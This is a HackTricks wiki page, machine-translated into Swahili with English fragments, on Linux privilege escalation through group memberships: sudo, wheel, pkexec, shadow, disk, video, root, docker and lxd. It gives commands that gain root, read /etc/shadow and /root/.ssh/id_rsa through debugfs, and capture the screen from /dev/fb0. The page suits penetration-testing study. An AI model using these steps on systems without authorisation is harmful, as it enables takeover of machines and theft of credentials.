hacktricks/linux-unix/privilege-escalation/interesting-groups-linux-pe.md

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

{% endhint %}

Sudo/Admin Groups

PE - Method 1

Wakati mwingine, kwa kawaida (au kwa sababu programu fulani inahitaji hivyo) ndani ya /etc/sudoers faili unaweza kupata baadhi ya mistari hii:

# Allow members of group sudo to execute any command
%sudo	ALL=(ALL:ALL) ALL

# Allow members of group admin to execute any command
%admin 	ALL=(ALL:ALL) ALL

Hii inamaanisha kwamba mtumiaji yeyote anaye belong kwenye kundi la sudo au admin anaweza kutekeleza chochote kama sudo.

Ikiwa hii ni hali, ili kuwa root unaweza tu kutekeleza:

sudo su

PE - Method 2

Pata binaries zote za suid na angalia kama kuna binary Pkexec:

find / -perm -4000 2>/dev/null

Ikiwa unapata kwamba binary pkexec ni binary ya SUID na unategemea sudo au admin, huenda unaweza kutekeleza binaries kama sudo ukitumia pkexec. Angalia maudhui ya:

cat /etc/polkit-1/localauthority.conf.d/*

Hapo utapata ni kundi gani lina ruhusa ya kutekeleza pkexec na kwa default katika baadhi ya linux zinaweza kuonekana baadhi ya makundi sudo au admin.

Ili kuwa root unaweza kutekeleza:

pkexec "/bin/sh" #You will be prompted for your user password

Ikiwa unajaribu kutekeleza pkexec na unapata makosa haya:

polkit-agent-helper-1: error response to PolicyKit daemon: GDBus.Error:org.freedesktop.PolicyKit1.Error.Failed: No session for cookie
==== AUTHENTICATION FAILED ===
Error executing command as another user: Not authorized

Sio kwa sababu huna ruhusa bali kwa sababu haujaunganishwa bila GUI. Na kuna suluhisho kwa tatizo hili hapa: https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903. Unahitaji sessions 2 tofauti za ssh:

{% code title="session1" %}

echo $$ #Step1: Get current PID
pkexec "/bin/bash" #Step 3, execute pkexec
#Step 5, if correctly authenticate, you will have a root session

{% endcode %}

{% code title="session2" %}

pkttyagent --process <PID of session1> #Step 2, attach pkttyagent to session1
#Step 4, you will be asked in this session to authenticate to pkexec

{% endcode %}

Wheel Group

Wakati mwingine, kwa kawaida ndani ya /etc/sudoers faili unaweza kupata mstari huu:

%wheel	ALL=(ALL:ALL) ALL

Hii inamaanisha kwamba mtumiaji yeyote anaye belong kwenye kundi la wheel anaweza kutekeleza chochote kama sudo.

Ikiwa hii ni hali, ili kuwa root unaweza tu kutekeleza:

sudo su

Shadow Group

Watumiaji kutoka kikundi shadow wanaweza kusoma faili ya /etc/shadow:

-rw-r----- 1 root shadow 1824 Apr 26 19:10 /etc/shadow

So, read the file and try to crack some hashes.

Disk Group

Hii haki ni karibu sawa na ufikiaji wa root kwani unaweza kufikia data zote ndani ya mashine.

Files:/dev/sd[a-z][1-9]

debugfs /dev/sda1
debugfs: cd /root
debugfs: ls
debugfs: cat /root/.ssh/id_rsa
debugfs: cat /etc/shadow

Kumbuka kwamba kutumia debugfs unaweza pia kuandika faili. Kwa mfano, ili nakala /tmp/asd1.txt kwenda /tmp/asd2.txt unaweza kufanya:

debugfs -w /dev/sda1
debugfs:  dump /tmp/asd1.txt /tmp/asd2.txt

Hata hivyo, ikiwa unajaribu kuandika faili zinazomilikiwa na root kama `/etc/shadow` au `/etc/passwd` utapata kosa la "Ruhusa imekataliwa".

Kundi la Video

Kwa kutumia amri w unaweza kupata nani aliyeingia kwenye mfumo na itakuonyesha matokeo kama ifuatavyo:

USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
yossi    tty1                      22:16    5:13m  0.05s  0.04s -bash
moshe    pts/1    10.10.14.44      02:53   24:07   0.06s  0.06s /bin/bash

The tty1 inamaanisha kwamba mtumiaji yossi amejiandikisha kimwili kwenye terminal kwenye mashine.

Kikundi cha video kina ufikiaji wa kuangalia matokeo ya skrini. Kimsingi unaweza kuangalia skrini. Ili kufanya hivyo unahitaji kuchukua picha ya sasa kwenye skrini katika data safi na kupata azimio ambalo skrini inatumia. Data ya skrini inaweza kuhifadhiwa katika /dev/fb0 na unaweza kupata azimio la skrini hii kwenye /sys/class/graphics/fb0/virtual_size

cat /dev/fb0 > /tmp/screen.raw
cat /sys/class/graphics/fb0/virtual_size

To fungua picha ya raw unaweza kutumia GIMP, chagua faili screen.raw na chagua kama aina ya faili Data ya picha ya raw:

Kisha badilisha Upana na Kimo kuwa zile zinazotumika kwenye skrini na angalia Aina tofauti za Picha na uchague ile inayoonyesha vizuri skrini:

Kundi la Root

Inaonekana kama kwa kawaida wanachama wa kundi la root wanaweza kuwa na ufikiaji wa kubadilisha baadhi ya faili za usanidi wa huduma au baadhi ya faili za maktaba au mambo mengine ya kuvutia ambayo yanaweza kutumika kuongeza mamlaka...

Angalia ni faili zipi wanachama wa root wanaweza kubadilisha:

find / -group root -perm -g=w 2>/dev/null

Docker Group

Unaweza kuunganisha mfumo wa faili wa mwenyeji kwenye volumu ya mfano, hivyo wakati mfano unapoanza, mara moja unaload chroot kwenye volumu hiyo. Hii inakupa root kwenye mashine.

{% embed url="https://github.com/KrustyHack/docker-privilege-escalation" %}

{% embed url="https://fosterelli.co/privilege-escalation-via-docker.html" %}

lxc/lxd Group

lxc - Privilege Escalation

{% hint style="success" %} Jifunze & fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze & fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

{% endhint %}